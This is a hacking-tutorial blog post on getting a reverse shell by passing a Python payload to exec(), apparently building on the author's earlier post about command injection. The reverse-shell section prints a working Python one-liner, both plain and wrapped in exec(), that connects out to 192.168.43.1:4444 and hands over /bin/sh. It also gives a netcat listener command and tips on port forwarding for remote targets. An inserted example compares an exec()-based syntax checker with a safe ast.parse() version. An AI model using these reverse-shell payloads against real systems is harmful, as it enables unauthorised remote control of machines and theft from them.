INTRO

If you read my last post, you saw examples of how a hacker can gain a command shell through a command-injection flaw in a website. In its last lines I promised to show you how to gain a shell.

Today's topic is going to be very interesting. Gaining a shell on a machine is a black-hat hacker's favourite thing, but keep in mind that we are not black-hat hackers: the same technique can be part of a CTF challenge you are participating in, or of an authorised penetration test.

Before starting this tutorial, I suggest you read some of my previous articles as revision:

1.Python Command Execution

2. All Kind Of Reverse Shell Explained

3. ICMP Reverse Shell

The first and second are important to read before going further. The third is not necessary, but take a look if you are curious about hacking Windows: there I explain in detail how to use the ICMP protocol to get a reverse shell.

 

ATTACK

First of all, I am sorry: I forgot to mention one more method of command execution with Python, so this post covers it, and we will use that method to get the reverse shell. I am using my Kali Linux machine for all the tasks here.

 

exec('print("HACKED!!!!")') – New Method
Python's exec() function executes a string (or code object) of Python source. It does not run a system command by itself; it runs whatever Python statements you hand it. Since those statements may import os or subprocess, though, exec() on attacker-controlled input still amounts to full command execution. Do not confuse it with PHP's exec(), which runs an operating-system command directly, or with SQL's EXEC, which runs a string as an SQL statement; JavaScript's equivalent is eval(). The common thread is that each one runs code written in its own language.
For example, I am using Python, so a Python statement would be:
print("Hi, i am lucky")

Now, to run it through exec(), we have to make it a string:

exec('print("Hi, i am lucky")')

Run it in the Python interpreter and you will see the result. A developer might use this function in many situations, for example a website that tells you whether the given input is valid Python code. If the site does that by calling exec() on the input, it executes the whole input on the server with the privileges of the web application, which is a very bad thing unless running user code is exactly what the site is meant to do (and even then it needs a sandbox). Checking syntax only needs the parser, not the interpreter.
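The scenario above, as an added example that is not from the original post: a "is this valid Python?" checker written with exec() next to the same checker written with ast.parse(), fed the same three constructed inputs. The malicious sample only sets an environment variable (the name EXEC_DEMO_PWNED is an assumption chosen as a harmless probe); a real attacker would put the reverse shell from this post there instead. The probe shows that the exec() version runs the input while the ast version merely parses it.

```python
import ast
import os

# Environment variable the constructed "malicious" sample sets; it is the
# probe for "did the checker actually execute the input?". (Assumed name.)
MARKER = "EXEC_DEMO_PWNED"

# Constructed sample inputs, standing in for user submissions to a
# "is this valid Python?" endpoint.
SAMPLES = {
    "benign": 'print("Hi, i am lucky")',
    # Harmless side effect for the demo; an attacker would use
    # subprocess.call(["/bin/sh", "-i"]) or the reverse shell from this post.
    "malicious": f"import os; os.environ[{MARKER!r}] = '1'",
    "not_python": "print('Hi, i am lucky'",  # missing closing parenthesis
}


def check_with_exec(source):
    """Vulnerable checker: decides 'valid Python?' by running it.

    exec() compiles and executes the statements, so any side effect in
    `source` happens with the privileges of this process. Passing an empty
    globals dict hides this module's names but does not stop `import os`.
    """
    try:
        exec(source, {})
    except SyntaxError:
        return False
    return True


def check_with_ast(source):
    """Hardened checker: ast.parse() only builds a syntax tree; nothing in
    `source` runs. compile(source, "<input>", "exec") would do equally well.
    """
    try:
        ast.parse(source)
    except SyntaxError:
        return False
    return True


def run_demo():
    """Feed every sample to both checkers and record whether the malicious
    sample's side effect actually happened."""
    results = {}
    for name, checker in (("ast", check_with_ast), ("exec", check_with_exec)):
        os.environ.pop(MARKER, None)
        verdicts = {label: checker(src) for label, src in SAMPLES.items()}
        results[name] = {
            "verdicts": verdicts,
            "executed_input": MARKER in os.environ,
        }
    return results


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(name, outcome)
```

Both checkers return the same verdicts for all three inputs, so the exec() version gains nothing in accuracy; it only adds code execution. If a site truly must run user code, that is a sandboxing problem (separate process, seccomp, containers, time and memory limits), not something exec() with a restricted globals dict can solve.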

 

Reverse-Shell

To get a reverse shell through the exec() function, you have to make the whole Python reverse shell a single string. I have already discussed the Python reverse shell in my previous articles, so I will not explain it again here.

A Python reverse shell looks like this:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Change the IP and port to your listener's address. Now we turn the code into a string so it can be the argument of exec(): remove the leading python -c and keep the single quotes around the code, as shown below. The inner double quotes around the IP do not clash with the outer single quotes, which is why this works without any escaping:

exec('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);')

Now that our call is ready, we can run it in the Python interpreter. Before you do, start a listener on the attacker machine on the port you chose (for example nc -lvnp 4444); otherwise the connect() call fails with ConnectionRefusedError and no shell appears.

Screenshots:

 

As you can see, the connection arrives from one terminal in the other. If you run it locally, use a local IP. If you are doing this against a remote target, the IP must be one the target can reach, so put your public IP in the payload and set up port forwarding from your router to the machine running the listener.

 

Stay home, stay safe and keep reading our articles.

Thanks For Visiting.
